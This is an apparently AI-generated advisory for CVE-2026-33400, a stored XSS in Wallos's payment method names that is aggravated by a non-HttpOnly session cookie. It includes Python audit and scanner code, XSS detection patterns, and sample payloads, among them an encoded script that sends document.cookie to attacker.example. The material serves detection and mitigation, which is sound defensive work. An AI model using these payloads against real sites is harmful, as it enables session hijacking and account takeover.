CVE-2026-33400 Overview
CVE-2026-33400 is a stored cross-site scripting (XSS) vulnerability affecting Wallos, an open-source, self-hostable personal subscription tracker application. The vulnerability exists in the payment method rename endpoint, allowing any authenticated user to inject arbitrary JavaScript that executes in the browser of any user who views the Settings, Subscriptions, or Statistics pages. The impact is amplified because the wallos_login authentication cookie lacks the HttpOnly flag, so injected script can read it through document.cookie and hand the attacker a full session hijack.
Critical Impact
Authenticated attackers can steal session cookies and hijack user accounts due to the combination of stored XSS and missing HttpOnly flag on authentication cookies.
Affected Products
- Wallosapp Wallos versions prior to 4.7.0
Discovery Timeline
- 2026-03-24 - CVE-2026-33400 published to NVD
- 2026-03-26 - Last updated in NVD database
Technical Details for CVE-2026-33400
Vulnerability Analysis
This stored XSS vulnerability occurs in the payment method rename functionality of Wallos. When a user renames a payment method, the application fails to properly sanitize or encode user-supplied input before storing it in the database and subsequently rendering it in the user interface. This allows an authenticated attacker to embed malicious JavaScript code within a payment method name that will execute in the browser context of any user who views pages where payment methods are displayed—specifically the Settings, Subscriptions, and Statistics pages.
The severity of this vulnerability is compounded by a secondary security weakness: the wallos_login authentication cookie is not configured with the HttpOnly flag. This oversight allows JavaScript code to access the cookie via document.cookie, enabling attackers to exfiltrate session tokens and perform complete account takeovers.
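The missing HttpOnly flag is something you can verify directly on your own instance, before and after upgrading. The following is an added example and not Wallos project code: it parses the Set-Cookie values from the HTTP response to a successful login and reports which protective attributes the session cookie lacks. The header strings in it are constructed samples; the Secure and SameSite checks are a hardening baseline of our own and are not findings from the advisory, which only names HttpOnly.

```python
"""Check whether a login response's session cookie carries HttpOnly (and Secure/SameSite).

Added example, not Wallos code. Feed it the Set-Cookie values from the HTTP
response to a successful login. The headers at the bottom are constructed
samples; only the HttpOnly gap is what the advisory describes.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional


@dataclass
class CookieAudit:
    name: str
    httponly: bool
    secure: bool
    samesite: Optional[str]

    def findings(self) -> List[str]:
        """Human-readable gaps, in a fixed order so reports are comparable."""
        out = []
        if not self.httponly:
            out.append("missing HttpOnly: value readable via document.cookie")
        if not self.secure:
            out.append("missing Secure: value sent over plaintext HTTP")
        if self.samesite is None:
            out.append("missing SameSite: sent on cross-site requests")
        return out


def parse_set_cookie(header_value: str) -> CookieAudit:
    """Parse one Set-Cookie value. Attribute names are case-insensitive (RFC 6265)."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, _ = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    return CookieAudit(
        name=name.strip(),
        httponly="httponly" in attrs,
        secure="secure" in attrs,
        # A bare "SameSite" with no value is treated as unset.
        samesite=attrs.get("samesite") or None,
    )


def audit_session_cookies(
    set_cookie_headers: Iterable[str], session_names=("wallos_login",)
) -> Dict[str, List[str]]:
    """Map each session cookie in the headers to its findings ([] means all flags present)."""
    report = {}
    for header in set_cookie_headers:
        cookie = parse_set_cookie(header)
        if cookie.name in session_names:
            report[cookie.name] = cookie.findings()
    return report


# Constructed samples: the first models the pre-4.7.0 behaviour the advisory
# describes (no HttpOnly on wallos_login); the second is the hardened target.
VULNERABLE_HEADERS = [
    "wallos_login=example-token; Path=/; Expires=Sat, 01 Jan 2028 00:00:00 GMT",
    "PHPSESSID=example-session; Path=/; HttpOnly",
]
HARDENED_HEADERS = [
    "wallos_login=example-token; Path=/; Expires=Sat, 01 Jan 2028 00:00:00 GMT; "
    "HttpOnly; Secure; SameSite=Lax",
]

if __name__ == "__main__":
    for label, headers in (("before", VULNERABLE_HEADERS), ("after", HARDENED_HEADERS)):
        print(label, audit_session_cookies(headers))
```

To run it against a live instance, pass the raw Set-Cookie values of the login response; with the requests library that is audit_session_cookies(response.raw.headers.getlist("Set-Cookie")). An empty findings list for wallos_login is what you want to see after the upgrade to 4.7.0.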
Root Cause
The root cause of this vulnerability is improper input validation and output encoding (CWE-79) in the payment method rename endpoint. The application accepts user input for payment method names without adequate sanitization and fails to apply proper HTML entity encoding when rendering these values in the browser. Additionally, the absence of the HttpOnly flag on the authentication cookie represents a defense-in-depth failure that escalates the impact of any XSS vulnerability.
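The encoding failure is easiest to see with the vulnerable rendering next to its hardened form. Wallos is a PHP application and its real templates are not reproduced here; the block below is an added Python illustration of the pattern, not the project's code, and the list-item markup and the payload are constructed for the example. The parser-based check at the end answers the question a reviewer of the fix would ask: does the rendered fragment still contain anything a browser would execute?

```python
"""Output-encoding demonstration for the CWE-79 root cause described above.

Added illustration, not Wallos code: the markup shape is assumed and the
payload is constructed to match what the advisory describes (an event
handler that can read document.cookie because HttpOnly is absent).
"""
import html
from html.parser import HTMLParser
from typing import List

PAYLOAD_NAME = '<img src=x onerror="alert(document.cookie)">'


def render_unsafe(name: str) -> str:
    """The bug pattern: the stored name is interpolated into markup verbatim."""
    return f'<li class="payment-method">{name}</li>'


def render_safe(name: str) -> str:
    """The fix pattern: encode at output time for the HTML context the value lands in.
    quote=True also escapes quotes, so the same helper is safe inside an attribute."""
    safe = html.escape(name, quote=True)
    return f'<li class="payment-method" title="{safe}">{safe}</li>'


class ActiveContentFinder(HTMLParser):
    """Records constructs a browser would execute while parsing a fragment:
    script-bearing elements, on* event-handler attributes and javascript: URLs."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe", "object", "embed"):
            self.hits.append(f"<{tag}> element")
        for key, value in attrs:
            if key.lower().startswith("on"):
                self.hits.append(f"{tag}@{key} handler")
            elif (
                key.lower() in ("href", "src", "action")
                and value
                and value.strip().lower().startswith("javascript:")
            ):
                self.hits.append(f"{tag}@{key} javascript: URL")


def active_content(fragment: str) -> List[str]:
    """Return the executable constructs found in an HTML fragment ([] if it is inert)."""
    parser = ActiveContentFinder()
    parser.feed(fragment)
    parser.close()
    return parser.hits


if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = render(PAYLOAD_NAME)
        print(f"{label}: {out}")
        print(f"   active content: {active_content(out)}")
```

The point of the escaped output is that the browser receives &lt;img ...&gt; as character data: the payment method name is displayed exactly as the attacker typed it, but no element or handler is created. Sanitizing on input is a useful extra layer, but the encoding on output is what actually closes CWE-79, because the same stored string is rendered in three different pages.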
Attack Vector
The attack is network-based and requires low-complexity execution. An attacker must have authenticated access to the Wallos application, which represents a low privilege requirement. The attacker simply navigates to the payment method settings, edits a payment method name, and injects a malicious JavaScript payload as the new name. When any other user (including administrators) views any page that displays payment methods, the JavaScript executes in their browser context. The attacker's script can then access the wallos_login cookie and transmit it to an attacker-controlled server, enabling session hijacking.
User interaction is required in the sense that a victim has to load one of the affected pages. In practice that bar is low: payment methods are rendered on the Settings, Subscriptions, and Statistics pages, which ordinary use of the application touches constantly, so every user who views them after the payload is stored, administrators included, is exposed to session hijacking and account compromise. See the GitHub Security Advisory for complete technical details.
Detection Methods for CVE-2026-33400
Indicators of Compromise
- Unusual or suspicious characters in payment method names, particularly script tags, event handlers (e.g., onerror, onclick), or encoded JavaScript
- Network requests from client browsers to unexpected external domains that may indicate cookie exfiltration
- Web server or application logs (where available) showing payment method rename requests whose name value contains HTML or JavaScript syntax, including URL-encoded or entity-encoded forms
Detection Strategies
- Implement web application firewall (WAF) rules to detect XSS payloads in HTTP request bodies targeting the payment method rename endpoint
- Monitor application logs for payment method modifications containing HTML/JavaScript syntax patterns
- Deploy a Content Security Policy (at the reverse proxy if the application does not set one) with report-uri or report-to configured, so that blocked inline scripts and unexpected script sources generate violation reports you can monitor
Monitoring Recommendations
- Enable detailed logging for all payment method modification operations and review for anomalous content
- Where you have visibility into client egress (corporate web proxies, browser telemetry), alert on requests that carry a wallos_login value to hosts other than your Wallos instance; CSP violation reports are usually the more practical signal
- Deploy runtime application self-protection (RASP) solutions to detect and block XSS payload execution
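The indicators above, and the audit of existing payment method names called for in the mitigation steps below, come down to one question: which stored names contain markup once encoding is stripped away? The following is an added example, not Wallos code. It normalises URL-encoding and HTML entities before pattern matching, so %3Cscript and &#60;svg are caught alongside plain tags, and runs the check over rows from SQLite. The table name payment_methods, column name and the db/wallos.db path are assumptions about the Wallos schema; confirm them with the sqlite3 .schema command before running against a real database. The sample rows are constructed.

```python
"""Scan stored payment-method names for XSS payloads, decoded forms included.

Added example, not Wallos code. The table and column names are an
ASSUMPTION about the Wallos SQLite schema; confirm them with
`sqlite3 db/wallos.db .schema` before running against a real instance.
"""
import html
import re
import sqlite3
from typing import Iterable, List, Tuple
from urllib.parse import unquote

# Patterns are applied after decoding; the labels are our own.
SUSPICIOUS = [
    ("tag_start", re.compile(r"<\s*/?\s*[a-z!?]", re.I)),       # <script, </style, <!--, <?
    ("event_handler", re.compile(r"\bon[a-z]{2,}\s*=", re.I)),  # onerror=, onload=
    ("js_url", re.compile(r"javascript\s*:", re.I)),
    ("data_url", re.compile(r"data\s*:\s*text/html", re.I)),
    ("dom_access", re.compile(r"\b(document|window)\s*\.", re.I)),  # document.cookie
]


def normalize(value: str, rounds: int = 3) -> str:
    """Peel URL-encoding and HTML entities so %3Cscript or &#60;svg are seen as tags."""
    for _ in range(rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


def classify(value: str) -> List[str]:
    """Labels of every suspicious pattern that matches the decoded value."""
    norm = normalize(value)
    return [label for label, rx in SUSPICIOUS if rx.search(norm)]


def scan_names(rows: Iterable[Tuple[int, str]]):
    """rows: (row_id, name) pairs. Returns [(row_id, name, labels)] for flagged names."""
    flagged = []
    for row_id, name in rows:
        if name and (labels := classify(name)):
            flagged.append((row_id, name, labels))
    return flagged


def scan_connection(con: sqlite3.Connection, table="payment_methods", column="name"):
    """ASSUMED schema: adjust table/column after checking .schema on the real database."""
    rows = con.execute(f'SELECT id, "{column}" FROM "{table}"').fetchall()
    return scan_names(rows)


# Constructed sample rows: two benign names (one with an apostrophe, a common
# false-positive trigger) and three payloads in plain, URL-encoded and
# entity-encoded form. attacker.example is a reserved documentation domain.
SAMPLE_NAMES = [
    (1, "Visa ending 1234"),
    (2, "Sarah's PayPal"),
    (3, '<img src=x onerror="alert(document.cookie)">'),
    (4, "%3Cscript%3Efetch%28%27https%3A//attacker.example/%3F%27%2Bdocument.cookie%29%3C/script%3E"),
    (5, "&#60;svg onload=alert(1)&#62;"),
]


def demo_in_memory():
    """Build an in-memory table with the assumed schema, seed it and scan it."""
    con = sqlite3.connect(":memory:")
    try:
        con.execute("CREATE TABLE payment_methods (id INTEGER PRIMARY KEY, name TEXT)")
        con.executemany("INSERT INTO payment_methods (id, name) VALUES (?, ?)", SAMPLE_NAMES)
        return scan_connection(con)
    finally:
        con.close()


if __name__ == "__main__":
    for row_id, name, labels in demo_in_memory():
        print(f"id={row_id} {labels}: {name!r}")
```

Against a real instance, call scan_connection(sqlite3.connect("db/wallos.db")) on a copy of the database. Treat a hit as a reason to delete or rename the row and to investigate which account created it, not as proof of exploitation on its own; a name containing an angle bracket can be innocent, but in a subscription tracker it is rare enough to review by hand.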
How to Mitigate CVE-2026-33400
Immediate Actions Required
- Upgrade Wallos to version 4.7.0 or later immediately
- Audit all existing payment method names for potentially malicious payloads and sanitize or remove suspicious entries
- Force re-authentication for all users to invalidate potentially compromised session tokens
- Review access logs for indicators of prior exploitation
Patch Information
This vulnerability has been patched in Wallos version 4.7.0. The fix is available in commit e87387f0ebb540cd33e6dfda7181db9db650ecef. Users should update to the latest version immediately. For detailed information about the security patch, see the GitHub Commit Changes and the GitHub Security Advisory.
Workarounds
- If immediate patching is not possible, restrict access to the Wallos application to trusted users only; every authenticated account can plant the payload, so the real exposure is the number of accounts you do not fully trust
- Implement a reverse proxy or WAF with XSS filtering in front of the application, and treat it as a stopgap only: request-body filters are routinely bypassed with encoding and tag variants
- If your reverse proxy can rewrite upstream cookie attributes, add the missing flag there; nginx 1.19.3 and later supports proxy_cookie_flags wallos_login httponly secure; in the location that proxies Wallos. This does not remove the XSS, but it closes the document.cookie exfiltration path the advisory highlights
- Manually audit and sanitize all existing payment method names to remove any potentially malicious content, and repeat the audit until the upgrade is applied, since any authenticated user can re-insert a payload
# Configuration example - Add CSP headers via reverse proxy (nginx)
# Add to your nginx server block to limit what an injected script can do.
# script-src 'self' blocks inline scripts and third-party script hosts; if Wallos
# pages stop working under it, ship the same policy as
# Content-Security-Policy-Report-Only first, review the reports, then enforce.
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none';" always;
add_header X-Content-Type-Options "nosniff" always;
# X-XSS-Protection is deprecated and ignored by current browsers; do not rely on it.
# The value 0 disables the legacy auditor, whose own bugs caused leaks in old browsers.
add_header X-XSS-Protection "0" always;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

